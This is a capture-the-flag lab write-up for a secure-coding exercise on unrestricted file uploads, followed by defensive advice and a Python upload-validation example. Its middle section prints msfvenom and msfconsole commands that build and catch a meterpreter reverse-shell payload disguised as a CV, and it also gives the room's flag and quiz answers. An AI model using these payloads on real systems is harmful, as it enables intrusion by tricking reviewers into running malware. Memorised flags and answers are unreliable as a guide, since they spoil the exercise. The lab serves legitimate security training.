
Advent of Cyber 2022 [Day 15] Secure Coding


Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.

Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.

Start the Machine and Paste the IP of the Machine into a Browser!

If Needed, Connect with TryHackMe’s VPN

1. What is the name given to file uploads that allow threat actors to upload any files that they want?

With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF).

Ans: Unrestricted

2. What is the title of the web application developed by Santa’s freelancer?

Ans: Santasidekick2

3. What is the value of the flag stored in the HR Elf’s Documents directory?

Just Upload a Dummy File!!

cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!

The Above Message ensures that a Person will Review the File, so we can Upload a Payload and wait for the Interaction.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe

Let’s Start the Reverse Handler!!

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"

Let’s Upload the Payload we Created in the Home Directory to the Website and Wait for the Interaction!!

We Got the Reverse Connection!!

Now Let’s Exploit

We are in the system32 Directory, so let’s move back to the C: Directory

cd ..
cd ..
cd Users
cd HR_Elf
cd Documents
cat flag.txt
Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}

4. What defence technique can be implemented to ensure that specific file types can be uploaded?

To ensure that only specific file types can be uploaded, we can verify the file extension. This will allow us to limit the type of files that can be uploaded.

Ans: file Extension validation

5. What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.

To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name.

Ans: File Renaming

6. What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!

In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file.

Ans: Malware Scanning
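As an added example (not code from the room or from Santa’s web application), here are the three defences from questions 4, 5 and 6 combined in one Python upload handler: an allow-listed extension check backed by a magic-byte check on the content, a random new file name, storage outside the web root, and a pluggable malware-scan hook. The `clamav_scan` function assumes ClamAV’s `clamdscan` is installed; the sample bytes and the `UploadRejected` name are constructed for the example.

```python
import secrets
import subprocess
from pathlib import Path
from typing import Callable, Optional

# Allow-list of permitted CV types, each mapped to the bytes a genuine
# file of that type starts with (so "cv.exe.pdf" containing an EXE fails).
ALLOWED = {".pdf": b"%PDF-", ".docx": b"PK\x03\x04"}


class UploadRejected(Exception):
    """Raised for any upload that fails a defence check."""


def validate_extension(filename: str) -> str:
    """Return the lower-cased extension if it is allow-listed, else reject."""
    ext = Path(filename).suffix.lower()  # only the LAST suffix counts
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} is not permitted")
    return ext


def clamav_scan(path: Path) -> bool:
    """Assumption: ClamAV is installed; clamdscan exits 0 only for clean files."""
    result = subprocess.run(["clamdscan", "--no-summary", str(path)],
                            capture_output=True)
    return result.returncode == 0


def store_upload(filename: str, data: bytes, upload_dir: Path,
                 scanner: Optional[Callable[[Path], bool]] = None) -> Path:
    """Validate, rename and store an upload; upload_dir must be outside the web root."""
    ext = validate_extension(filename)
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("file content does not match the declared type")
    # Random name: the user-supplied name (and any path in it) is never used,
    # so the uploader cannot guess where the file landed.
    stored = upload_dir / (secrets.token_hex(16) + ext)
    upload_dir.mkdir(parents=True, exist_ok=True)
    stored.write_bytes(data)
    # Scan after writing; delete on detection so nothing malicious is kept.
    if scanner is not None and not scanner(stored):
        stored.unlink()
        raise UploadRejected("malware detected by scanner")
    return stored


if __name__ == "__main__":
    import tempfile
    out = store_upload("cv.PDF", b"%PDF-1.4 constructed sample",
                       Path(tempfile.mkdtemp()), scanner=lambda p: True)
    print("stored as", out)
```

Pass `scanner=clamav_scan` in production; the `__main__` block uses a stub scanner so it runs without ClamAV.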

Thank you for Reading!!

Happy Hacking ~


